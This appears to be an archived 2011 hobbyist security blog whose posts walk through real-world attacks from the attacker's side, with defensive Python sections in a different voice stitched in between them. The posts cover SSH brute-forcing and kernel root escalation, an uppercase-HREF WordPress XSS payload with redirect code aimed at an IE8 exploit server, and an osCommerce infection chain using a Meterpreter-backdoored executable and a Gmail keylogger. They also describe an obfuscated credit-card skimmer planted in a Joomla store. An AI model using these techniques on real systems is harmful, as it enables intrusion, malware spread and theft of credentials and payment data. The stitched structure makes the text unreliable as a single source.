Wednesday, December 7, 2011

Ubuntu Server Exploit (Local Privilege Escalation)

Today we're going to talk about an "old" vulnerability discovered by Dan Rosenberg in the Linux kernel. This bug affects versions prior to 2.6.38 and lets a user with low privileges gain root access.

Link to exploit: Linux Kernel <= 2.6.37 Local Privilege Escalation

The text below is taken from the exploit description.

This exploit leverages three vulnerabilities to get root, all of which were
discovered by Nelson Elhage:

CVE-2010-4258
-------------
This is the interesting one, and the reason I wrote this exploit.  If a
thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
word will be written to a user-specified pointer when that thread exits.
This write is done using put_user(), which ensures the provided destination
resides in valid userspace by invoking access_ok().  However, Nelson
discovered that when the kernel performs an address limit override via
set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
etc.), this override is not reverted before calling put_user() in the exit
path, allowing a user to write a NULL word to an arbitrary kernel address.
Note that this issue requires an additional vulnerability to trigger.

CVE-2010-3849
-------------
This is a NULL pointer dereference in the Econet protocol.  By itself, it's
fairly benign as a local denial-of-service.  It's a perfect candidate to
trigger the above issue, since it's reachable via sock_no_sendpage(), which
subsequently calls sendmsg under KERNEL_DS.

CVE-2010-3850
-------------
I wouldn't be able to reach the NULL pointer dereference and trigger the
OOPS if users weren't able to assign Econet addresses to arbitrary
interfaces due to a missing capabilities check.

- Victim: (with Ubuntu Server 10.04, kernel 2.6.32)
- Attacker: (with BackBox 2)

This forum runs the latest version of the phpBB3 CMS, so there is no way to take advantage of any of its flaws.

To start, we check the name of the forum administrator; if we are lucky, it will be the same as the SSH account name. This time we are lucky, and after a simple brute-force attack with Hydra we got john's password.

After the successful attack we log in and check whether the kernel version is vulnerable and whether gcc is present (by default all Linux distributions have it). Now it's time to upload the exploit through SFTP and execute it. After getting the root account we can inject JavaScript code into some phpBB3 files to spread malware, as happened a few months ago to , or just install a rootkit.
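Added example (not code from this post or from the exploit's author): two defender-side checks for the bug chain quoted above, written in Python. The first classifies a kernel release string against the upstream fix boundary the post gives (2.6.38); the second looks at the contents of /proc/modules and of the modprobe.d configuration files to tell whether the Econet module that CVE-2010-3849 and CVE-2010-3850 go through is loaded, blocked, or still loadable on demand. The function names, the constructed sample data, and the choice to pass file contents in as strings instead of reading the live system are this example's own assumptions.

```python
"""Defender-side checks for the kernel bug chain (added example; function names,
sample data and the string-based interface are assumptions of this example)."""

import re

FIXED_IN = (2, 6, 38)      # first upstream release with the fixes, per the post


def parse_kernel_version(release: str) -> tuple:
    """'2.6.32-21-server' -> (2, 6, 32); missing components count as 0."""
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", release.strip())
    if not m:
        raise ValueError(f"unparseable kernel release: {release!r}")
    return tuple(int(x) if x else 0 for x in m.groups())


def kernel_is_affected(release: str) -> bool:
    """True when the upstream version number is below the fix boundary.
    Distribution kernels backport fixes under the same number, so this is a
    prompt to read the vendor advisory, not proof of exposure."""
    return parse_kernel_version(release) < FIXED_IN


def econet_exposure(modules_text: str, modprobe_conf_texts) -> str:
    """Classify the Econet trigger path from /proc/modules content and the
    text of each modprobe.d *.conf file:
      'loaded'   - module present in /proc/modules
      'blocked'  - not loaded, and a conf file maps it to /bin/true
      'autoload' - not loaded and not blocked; a request for the protocol
                   family could still pull the module in"""
    for line in modules_text.splitlines():
        if line.strip() and line.split()[0] == "econet":
            return "loaded"
    # The "install <module> /bin/true" idiom makes modprobe run /bin/true
    # instead of loading the module, which closes the autoload path.
    block_re = re.compile(r"^\s*install\s+econet\s+/bin/true\b", re.M)
    if any(block_re.search(text) for text in modprobe_conf_texts):
        return "blocked"
    return "autoload"


def assess(release: str, modules_text: str, modprobe_conf_texts) -> list:
    """Return the findings that need attention (empty list = nothing to do)."""
    findings = []
    if kernel_is_affected(release):
        findings.append(f"kernel {release} is below "
                        f"{'.'.join(map(str, FIXED_IN))}: confirm the "
                        "distribution's backported fix")
    state = econet_exposure(modules_text, modprobe_conf_texts)
    if state == "loaded":
        findings.append("econet module is loaded: trigger path reachable")
    elif state == "autoload":
        findings.append("econet not loaded but not blocked: add "
                        "'install econet /bin/true' to a modprobe.d conf file")
    return findings


# Constructed sample data standing in for /proc/modules and /etc/modprobe.d/*.conf
SAMPLE_MODULES = ("ext4 241664 1 - Live 0x0000000000000000\n"
                  "bridge 53248 0 - Live 0x0000000000000000\n")
SAMPLE_CONFS = ["# constructed blacklist file\ninstall econet /bin/true\n"]

if __name__ == "__main__":
    for finding in assess("2.6.32-21-server", SAMPLE_MODULES, SAMPLE_CONFS) or ["nothing to do"]:
        print(finding)
```

A release below 2.6.38 is only a prompt to check the distribution advisory, because vendor kernels such as the 2.6.32 one in the post's lab may carry backported fixes under the same version number; the Econet state is the more direct signal, since the exploit chain needs that module in the kernel.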

Sunday, November 6, 2011

Have fun with scammers

A couple of days ago I received this e-mail:

After reading it I decided to play along and have some fun with him, so I replied, and after one day I got the response.

To convince me he attached four pictures of the flat. Here are the living room and my future bedroom.

Anyone can see that this picture is from a five-star hotel, but to be really sure I used Google search by image, and what did I find? These images are from a hotel in the center of Milan.

Things were getting interesting, so I decided to find out how I could get this awesome flat.

His response.

Now it's time to send him my personal information in a PDF.

After this e-mail I haven't had any response; maybe he is angry with me, but I don't know why :(.

Tuesday, November 1, 2011

Wordpress XSS Vulnerability + IE 8 Exploit

On 30 December 2010 a guy named sneak reported a persistent XSS vulnerability that affects the popular blog CMS WordPress <= 3.0.3.

The problem is located in the kses.php file, which is the HTML sanitization library. If we write a link with the href attribute in capital letters, this library doesn't filter the content properly.

<a HREF="javascript:alert(0)">CLICK HERE</a>

If we post it in a comment, this tag is accepted as an ordinary link. With this vulnerability we can craft a piece of code that steals cookies, redirects to other sites, etc.
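Added example (a simplified model in Python, not the kses.php source): the bug class described above is an attribute filter that compares attribute names case-sensitively. HTML attribute names are case-insensitive, so a filter that only inspects a lowercase "href" lets HREF="javascript:..." through unchanged while the browser still treats it as a link. The allowed scheme list, the set of attributes treated as URL-bearing, and the function names are assumptions made for this example; the first sample comment is the one from the post.

```python
"""Case-sensitive vs. case-insensitive attribute filtering (added example; the
scheme allowlist, URL attribute set and function names are assumptions)."""

import re
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https", "mailto", "ftp"}   # example allowlist
URL_ATTRS = {"href", "src"}                          # attributes whose value is a URL
# name="value" pairs; the leading \s* lets a dropped attribute take its space with it
ATTR_RE = re.compile(r'\s*([A-Za-z_:][-\w:.]*)\s*=\s*"([^"]*)"')


def url_scheme_is_safe(value: str) -> bool:
    """True for relative URLs and allowlisted schemes.  Browsers ignore leading
    control characters/whitespace and embedded tab/CR/LF when parsing a URL,
    so those are stripped before the scheme is examined."""
    cleaned = re.sub(r"[\t\r\n]", "", value)
    cleaned = re.sub(r"^[\x00-\x20]+", "", cleaned)
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


def _filter(tag: str, normalise_name) -> str:
    """Drop every URL-bearing attribute whose scheme is not allowed; the
    caller decides how the attribute name is normalised before comparison."""
    def repl(m):
        name, value = normalise_name(m.group(1)), m.group(2)
        if name in URL_ATTRS and not url_scheme_is_safe(value):
            return ""              # remove the offending attribute
        return m.group(0)
    return ATTR_RE.sub(repl, tag)


def filter_anchor_vulnerable(tag: str) -> str:
    """Compares the name as written: 'HREF' != 'href', so it is never checked."""
    return _filter(tag, lambda name: name)


def filter_anchor_hardened(tag: str) -> str:
    """Lower-cases the name first, matching how the browser reads it."""
    return _filter(tag, str.lower)


# The comment from the post, plus a constructed legitimate link for comparison
EVIL_COMMENT = '<a HREF="javascript:alert(0)">CLICK HERE</a>'
GOOD_COMMENT = '<a href="https://example.com/page" title="ok">link</a>'

if __name__ == "__main__":
    print("vulnerable:", filter_anchor_vulnerable(EVIL_COMMENT))
    print("hardened:  ", filter_anchor_hardened(EVIL_COMMENT))
    print("hardened (benign input):", filter_anchor_hardened(GOOD_COMMENT))
```

The regex is only enough to make the case-handling point; a real sanitizer parses attributes with an HTML tokenizer and decodes character entities before checking the scheme, since the browser decodes them too.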

This video shows how easy it is for anyone to craft an evil comment that redirects the victim to a server hosting an exploit for Internet Explorer 8 (CVE-2010-3971).

Our evil code:
var s = navigator.userAgent;

if (s.indexOf('MSIE 8.0') != -1) {
    window.location = "";
}

Reference and more detailed information:
- Sneak blog 
- Metasploit Unleashed
- Javascript Obfuscator

Tuesday, October 4, 2011

OsCommerce Malware Infection

Three months ago a huge site infection campaign started against osCommerce, a popular CMS for small and medium online stores. This CMS suffers from several vulnerabilities that let an attacker upload files and execute remote code.

- osCommerce 2.2 Remote File Upload Vulnerability
- osCommerce authentication bypass
- osCommerce 2.2 Arbitrary PHP Code Execution
- osCommerce 2.3.1 Remote File Upload Vulnerability

Today (4/10/2011) the total number of infected sites is 830,000, but two months ago it was 8 million.

On some compromised sites the attacker has left the webshell behind.

After uploading a backdoor, the attacker edits the home page and adds a script/iframe tag that loads multiple browser exploits.
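Added example (not code from this post): a detector, in Python, for the kind of injection just described, where a compromised page gets a script or iframe tag that pulls browser exploits from another host. It parses an HTML document and flags iframe and script tags whose src points outside the site's own host allowlist, and iframes styled to be invisible to the visitor. The sample page, the host names in it, and the function and class names are constructed for this example.

```python
"""Flag injected script/iframe loaders in an HTML page (added example; the
sample page, host names and class/function names are constructed)."""

from html.parser import HTMLParser
from urllib.parse import urlsplit


class InjectedLoaderScanner(HTMLParser):
    """Collects iframe/script tags that load from non-allowlisted hosts and
    iframes that are sized or styled so the visitor never sees them."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = {name: (value or "") for name, value in attrs}   # names arrive lower-cased
        src = a.get("src", "").strip()
        if not src:
            return          # inline <script> bodies need a different check
        host = (urlsplit(src).hostname or "").lower()         # "" for relative URLs
        reasons = []
        if host and host not in self.allowed_hosts:
            reasons.append(f"loads from external host {host}")
        if tag == "iframe" and self._looks_hidden(a):
            reasons.append("iframe is hidden from the visitor")
        if reasons:
            self.findings.append({"tag": tag, "src": src,
                                  "line": self.getpos()[0], "reasons": reasons})

    @staticmethod
    def _looks_hidden(a):
        style = a.get("style", "").replace(" ", "").lower()
        tiny = {a.get("width", "").strip(), a.get("height", "").strip()} & {"0", "1", "0px", "1px"}
        return bool(tiny) or "display:none" in style or "visibility:hidden" in style


def scan_html(html: str, allowed_hosts) -> list:
    """Return one finding dict per suspicious tag, in document order."""
    scanner = InjectedLoaderScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a store page with two legitimate scripts and one injected iframe
SAMPLE_PAGE = """<html><body>
<h1>Welcome to our store</h1>
<script src="/includes/general.js"></script>
<script src="http://shop.example/js/cart.js"></script>
<iframe src="http://malware-host.example/jquery.js" width="0" height="0"
        style="display:none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE, {"shop.example"}):
        print(f"line {f['line']}: <{f['tag']} src={f['src']}> -> {', '.join(f['reasons'])}")
```

Running it over a site's templates and the rendered home page after a suspected compromise turns "the attacker added an iframe" into a concrete list of lines to inspect; the allowlist should contain every host the site legitimately loads from, including its CDN, so that only unexpected origins are reported.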

Exploits used:
- IE 6 Remote Code Execution
- Java Runtime Environment Remote Code Execution Vulnerability
- Microsoft Windows Help
- Adobe Reader and Acrobat 8.x

After successful exploitation, malware is downloaded and executed.

- ----> Attacker with BackBox 2.0
- -----> Victim with osCommerce 2.2
- ----> Malware host

- jquery.js (IE 6 Remote Code Execution, CVE-2006-0003)
- windows.exe (Windows calculator with a reverse Meterpreter TCP payload)

What I want to show you is how an attacker probably infected a site running an old copy of osCommerce to spread malware. These are the steps:

1- Find a place to host our malicious code, so we need to find a server with a weak SSH/FTP password (

2- Create our malware by injecting a Meterpreter reverse payload into calc.exe and encoding it 3 times with shikata_ga_nai.

3- Wait for the connection back.

4- Upload the malware and exploit to

5- Wait for a victim.

6- Do what you want.

After obtaining the Meterpreter shell we start the keylogger to steal Gmail login credentials.

Reference and more detailed information:
- Willysycom mass injection ongoing
- Metasploit Unleashed

Wednesday, September 21, 2011

Wordpress TimThumb Exploit (Remote Code Execution)

A lot of WordPress themes use the TimThumb script to resize images. From version 1.15 to 1.33, TimThumb allows external domains such as  to display remote images on your website.

More detailed information here:
- Wordpress timthumb hack
- Zero Day vulnerability in many wordpress themes

- TimThumb version used
- Vulnerable wordpress theme
- List of vulnerable wordpress themes

Tuesday, September 20, 2011

Joomla Plugin Exploit + PHP Malware

Garden Store has a vulnerable version (1.1.7) of VirtueMart (a Joomla plugin), and through a blind SQL injection we can retrieve the administrator credentials.

We edit the main template and place in the footer tag a small, properly obfuscated piece of code to capture users' credit card data.

- virtuemart exploit found by TecR0c & mr_me
- joomla hash cracker
- php obfuscator
- dopost source code
- getcc source code

Monday, September 19, 2011

Why this blog

Hi People,

I've decided to open this blog because I can't always explain everything through a video and its description box.

Remember... I'm NOT an expert or a regular blogger, and I make videos only for fun.

I also have a Twitter account: @SecObscurity.

See you soon.